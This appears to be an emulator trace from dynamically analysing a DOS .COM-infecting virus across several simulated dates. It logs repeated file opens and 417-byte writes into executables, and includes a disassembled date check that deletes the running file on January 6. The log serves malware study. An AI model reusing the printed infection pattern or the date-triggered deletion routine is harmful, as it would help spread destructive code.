2018-12-25T12:30:16.804480943Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.81021589Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.812565617Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.816691163Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.820921188Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.822996561Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.823964616Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.825703828Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.827473389Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.836661135Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.846080932Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.85828535Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.864703425Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.870600264Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.872167329Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.874821898Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.878159098Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.880363428Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.883558977Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.890903312Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.893872788Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.901022209Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.921461585Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.923993894Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.926594396Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.929453472Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.931092104Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.93508566Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.942688553Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.945594234Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.95349238Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.961123823Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.962627422Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.964781444Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.967820494Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.96925014Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.973922395Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.982223971Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.985564177Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.99249393Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.999205154Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:17.000885773Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:17.002968679Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:17.006327758Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:17.007695013Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:17.010516745Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:17.018285968Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:17.021107574Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:17.028661062Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:17.031488038Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:17.033135918Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:17.035172418Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:17.037910909Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:17.039278671Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:17.048443306Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:17.056928085Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:17.059199343Z 26 PC: 12aff | Set disk transfer address
2018-12-25T12:30:17.060461829Z 42 PC: 12bb0 | Get date
0x12bb0: cmp dl, 6
0x12bb3: jne 0x12bd8
0x12bb5: cmp dh, 1
0x12bb8: jne 0x12bd8
0x12bba: xor ax, ax
0x12bbc: mov cx, 0x7fff
0x12bbf: xor di, di
0x12bc1: mov es, word ptr es:[0x2c]
0x12bc6: cld
0x12bc7: repne scasd eax, dword ptr es:[di]
0x12bc9: jne 0x12bd8
0x12bcb: add di, 2
0x12bce: push ds
0x12bcf: push es
0x12bd0: pop ds
0x12bd1: mov ah, 0x41
0x12bd3: mov dx, di
0x12bd5: int 0x21
0x12bd7: pop ds
0x12bd8: pop es
2018-12-25T12:30:17.06310688Z 76 PC: 12a45 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":6,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11264,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:16.802379638Z 26 PC: 12adf | Set disk transfer address
2018-12-25T12:30:16.804341711Z 78 PC: 12ae8 | Find first file
2018-12-25T12:30:16.808728389Z 61 PC: 12b21 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:16.813321164Z 63 PC: 12b3a | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:30:16.817976748Z 66 PC: 12b5d | Move file pointer
2018-12-25T12:30:16.819812271Z 66 PC: 12b72 | Move file pointer
2018-12-25T12:30:16.820920783Z 64 PC: 12b7e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:30:16.823108631Z 66 PC: 12b8b | Move file pointer
2018-12-25T12:30:16.824874073Z 64 PC: 12b97 | Write file or device (Write 417 bytes on handle 5)
2018-12-25T12:30:16.837973811Z 62 PC: 12ba8 | Close file
2018-12-25T12:30:16.846661898Z 79 PC: 12af1 | Find next file
2018-12-25T12:30:16.856763426Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.881768761Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.888554363Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.891432116Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.893154126Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.896098149Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.898798786Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.901658245Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.909546369Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.913390578Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.920293284Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.92707286Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.928934094Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.931448967Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.934041333Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.935304253Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.948729964Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.972052161Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.974763169Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.983431987Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.990321393Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:17.000672082Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:17.002759993Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:17.005340503Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:17.006668785Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:17.01065015Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:17.020512215Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:17.023385379Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:17.030616557Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:17.038176698Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:17.039860205Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:17.042678143Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:17.046360568Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:17.048252201Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:17.051263623Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:17.060001797Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:17.062899927Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:17.069565087Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:17.077172131Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:17.078930959Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:17.08064073Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:17.08452066Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:17.086164223Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:17.090213147Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:17.099273805Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:17.101964581Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:17.108384296Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:17.115753419Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:17.117166687Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:17.118500484Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:17.121991788Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:17.123443684Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:17.127142262Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:17.148804598Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:17.151482357Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:17.157845517Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:17.161443275Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:17.162881265Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:17.164212863Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:17.167768776Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:17.169268991Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:17.177477044Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:17.186661413Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:17.189549145Z 26 PC: 12aff | Set disk transfer address
2018-12-25T12:30:17.191060634Z 42 PC: 12bb0 | Get date
0x12bb0: cmp dl, 6
0x12bb3: jne 0x12bd8
0x12bb5: cmp dh, 1
0x12bb8: jne 0x12bd8
0x12bba: xor ax, ax
0x12bbc: mov cx, 0x7fff
0x12bbf: xor di, di
0x12bc1: mov es, word ptr es:[0x2c]
0x12bc6: cld
0x12bc7: repne scasd eax, dword ptr es:[di]
0x12bc9: jne 0x12bd8
0x12bcb: add di, 2
0x12bce: push ds
0x12bcf: push es
0x12bd0: pop ds
0x12bd1: mov ah, 0x41
0x12bd3: mov dx, di
0x12bd5: int 0x21
0x12bd7: pop ds
0x12bd8: pop es
2018-12-25T12:30:17.19374917Z 65 PC: 12bd7 | Delete file (Filename = 'A:\TEST.COM')
2018-12-25T12:30:17.205426079Z 76 PC: 12a45 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":6,"Month":2,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11264,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:16.822274331Z 26 PC: 12adf | Set disk transfer address
2018-12-25T12:30:16.823685445Z 78 PC: 12ae8 | Find first file
2018-12-25T12:30:16.827735594Z 61 PC: 12b21 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:16.832131693Z 63 PC: 12b3a | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:30:16.836253098Z 66 PC: 12b5d | Move file pointer
2018-12-25T12:30:16.837843521Z 66 PC: 12b72 | Move file pointer
2018-12-25T12:30:16.838950696Z 64 PC: 12b7e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:30:16.840744876Z 66 PC: 12b8b | Move file pointer
2018-12-25T12:30:16.843368497Z 64 PC: 12b97 | Write file or device (Write 417 bytes on handle 5)
2018-12-25T12:30:16.855382485Z 62 PC: 12ba8 | Close file
2018-12-25T12:30:16.863581314Z 79 PC: 12af1 | Find next file
2018-12-25T12:30:16.866185905Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.870548297Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.875373058Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.877734295Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.879577864Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.883520112Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.886023889Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.888506074Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.899260999Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.902442178Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.915834711Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.923112436Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.924700425Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.926699004Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.929651181Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.931241183Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.941031776Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.951189358Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.954554207Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.962640787Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.970001452Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.971883581Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.974511074Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.977462949Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.978964314Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.982301465Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.991292037Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.994300861Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:17.002092924Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:17.010530213Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:17.012059444Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:17.013566167Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:17.017042518Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:17.019482523Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:17.02244667Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:17.031310587Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:17.034402027Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:17.042680147Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:17.05054739Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:17.052423551Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:17.054957945Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:17.059824418Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:17.061395705Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:17.065905884Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:17.075656327Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:17.07921299Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:17.087393345Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:17.094646861Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:17.096922245Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:17.098566485Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:17.102060881Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:17.104666733Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:17.107591275Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:17.116733638Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:17.121051403Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:17.128738972Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:17.132164309Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:17.134975963Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:17.136872947Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:17.14025078Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:17.142679753Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:17.152149103Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:17.162086678Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:17.164983397Z 26 PC: 12aff | Set disk transfer address
2018-12-25T12:30:17.167025107Z 42 PC: 12bb0 | Get date
0x12bb0: cmp dl, 6
0x12bb3: jne 0x12bd8
0x12bb5: cmp dh, 1
0x12bb8: jne 0x12bd8
0x12bba: xor ax, ax
0x12bbc: mov cx, 0x7fff
0x12bbf: xor di, di
0x12bc1: mov es, word ptr es:[0x2c]
0x12bc6: cld
0x12bc7: repne scasd eax, dword ptr es:[di]
0x12bc9: jne 0x12bd8
0x12bcb: add di, 2
0x12bce: push ds
0x12bcf: push es
0x12bd0: pop ds
0x12bd1: mov ah, 0x41
0x12bd3: mov dx, di
0x12bd5: int 0x21
0x12bd7: pop ds
0x12bd8: pop es
2018-12-25T12:30:17.169865462Z 76 PC: 12a45 | Terminate with return code (Return code = '0')